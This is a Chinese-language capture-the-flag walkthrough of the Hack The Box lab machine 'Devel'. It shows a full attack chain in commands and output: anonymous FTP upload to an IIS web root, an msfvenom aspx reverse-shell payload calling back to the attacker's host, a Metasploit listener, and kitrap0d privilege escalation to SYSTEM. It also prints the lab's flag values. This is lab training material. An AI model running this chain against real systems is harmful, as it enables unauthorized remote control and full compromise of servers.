Hackthebox - Devel

靶场信息

靶场类型

信息搜集

Nmap

┌──(root💀kali)-[~/Desktop/HTB/Easy/Devel]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.5                                                                                                                                                        130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 02:16 EST
Nmap scan report for 10.10.10.5
Host is up (0.70s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|8.1|2012 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   934.01 ms 10.10.16.1
2   934.05 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.29 seconds

Http

先去看看80端口的web服务

就是一个普通的IIS页面,没什么可看的

FTP

FTP可以看到有两个文件,并且可以匿名登录

┌──(root💀kali)-[~/Desktop/HTB/Easy/Devel]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

这里看到两个文件,似乎和80端口的是一样的

去本地创建个文件传上去试试

┌──(root💀kali)-[~/Desktop]
└─# echo "I'm Lucifiel" > test.html
┌──(root💀kali)-[~/Desktop]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.html 
local: test.html remote: test.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
14 bytes sent in 0.00 secs (303.8194 kB/s)
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-03-22  09:29AM                   14 test.html
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

成功传上去了,咱们去访问看看有没有

┌──(root💀kali)-[~/Desktop]
└─# curl http://10.10.10.5/test.html                                                                                   
I'm Lucifiel

OK,传上去了,证明猜想没错,那就简单了,去生成个马传上去吧

漏洞利用

┌──(root💀kali)-[~/Desktop]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2901 bytes
Saved as: shell.aspx

使用msf生成一个aspx的木马

┌──(root💀kali)-[~/Desktop]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2938 bytes sent in 0.00 secs (58.3728 MB/s)

然后使用ftp传上去

msf6 > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.2
lhost => 10.10.16.2
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.10.16.2:4444

然后使用msf开启端口监听

┌──(root💀kali)-[~/Desktop/HTB/Easy/Devel]
└─# curl http://10.10.10.5/shell.aspx

然后访问我们上传的aspx马

msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.10.16.2:4444 
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.5:49162) at 2022-03-03 02:37:15 -0500

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows

成功拿到shell

权限提升

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit 

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 38 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Post module execution completed

使用post/multi/recon/local_exploit_suggester作为提权辅助脚本

这里测试出来可以使用的提权exp挺多的,我们就拿第一个吧

use exploit/windows/local/ms10_015_kitrap0d
set session 1
set lhost 10.10.16.2
msf6 exploit(windows/local/ms10_015_kitrap0d) > show options 

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.2       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

设置好以后,执行

msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit 

[*] Started reverse TCP handler on 10.10.16.2:4444 
[*] Launching notepad to host the exploit...
[+] Process 3972 launched.
[*] Reflectively injecting the exploit DLL into 3972...
[*] Injecting exploit into 3972 ...
[*] Exploit injected. Injecting payload into 3972...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.16.2:4444 -> 10.10.10.5:49163) at 2022-03-03 02:44:09 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows

成功拿到system权限

meterpreter > search -f user.txt
Found 1 result...
    c:\Users\babis\Desktop\user.txt (34 bytes)
meterpreter > cat 'c:\Users\babis\Desktop\user.txt'
489b24475e33a86c802d19db5fbd40e1
meterpreter > search -f root.txt
Found 1 result...
    c:\Users\Administrator\Desktop\root.txt (34 bytes)
meterpreter > cat 'c:\Users\Administrator\Desktop\root.txt'
af3b66607827cd5c2153fdbfff2a558a

成功拿到user和root权限的flag文件